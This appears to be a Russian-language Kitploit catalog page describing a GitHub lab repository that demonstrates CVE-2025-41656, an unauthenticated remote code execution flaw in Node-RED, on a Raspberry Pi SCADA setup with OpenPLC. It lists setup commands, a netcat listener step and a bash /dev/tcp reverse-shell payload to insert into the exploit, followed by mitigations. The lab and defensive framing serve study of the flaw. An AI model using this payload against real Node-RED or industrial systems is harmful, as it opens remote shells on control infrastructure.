Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-41656 — Этот репозиторий содержит код и файлы, необходимые для тестирования и выполнения PoC для CVE-2025-41656 | Kitploit
Инструменты/GitHubGitHub/wallyschag/cve-2025-41656
Безопасность IoTАнализ уязвимостейЭксплуатацияБезопасность SCADA/ICSОбучение и ОбразованиеЛаборатории и Практика
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

Этот репозиторий содержит код и файлы, необходимые для тестирования и выполнения PoC для CVE-2025-41656

Репозиторий
2410 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-41656

Краткое описание проекта

Данный проект предназначен для моделирования CVE-2025-41656 — уязвимости удаленного выполнения кода без аутентификации для NodeRED. Для моделирования этой уязвимости мы создали компактную SCADA-систему на базе raspberry pi, включающую исполнительный механизм и датчик. Raspberry pi содержит контейнеры NodeRED и OpenPLC, которые общаются друг с другом по протоколу Modbus TCP для управления исполнительным механизмом. Это сценарий proof of concept на Python для реализации атаки CVE-2025-41656. Цель — успешно создать PoC и найти меры по устранению уязвимости для защиты системы.

Начало работы

Лабораторная установка будет включать следующие компоненты:

  • Rasberry Pi 3b+
  • Файл Docker Compose с контейнерами NodeRED и OpenPLC
  • Исполнительный механизм
  • Датчик
  • Моторизованное устройство, управляемое исполнительным механизмом
  • Примечание: настройка будет различаться в зависимости от используемого оборудования. Подстраивайтесь соответствующим образом.

Установка программного обеспечения

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

Настройка Docker

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • Проверьте, что контейнеры Docker и сетевой мост работают
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • Оба контейнера Docker должны быть запущены.
  • Также убедитесь, что оба контейнера подключены к сети и имеют назначенные IP-адреса.

Эксплойт

  • На хост-машине выполните nc -lvnp 1234
  • Замените NODE_RED_IP и NODE_RED_PORT на IP-адрес и порт (1880) вашего сервиса NodeRED в файле cve_2025_41656.py.
  • Внутри cve_2025_41656 замените IP-адрес в строке "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", на IP-адрес машины, с которой вы запускаете эксплойт.
root@kitploit:~
python3 cve_2025_41656.py
  • Теперь у вас должна быть обратная оболочка (reverse shell) на контейнере NodeRED.

Стратегии смягчения последствий

  • Внедрите TLS и механизм аутентификации для NodeRED.
  • Сегментируйте SCADA-сети, чтобы предотвратить несанкционированный доступ к NodeRED.
  • Мониторьте сети, содержащие NodeRED, с помощью систем IDS/IPS, отслеживая трафик обратных оболочек.
Скачать инструмент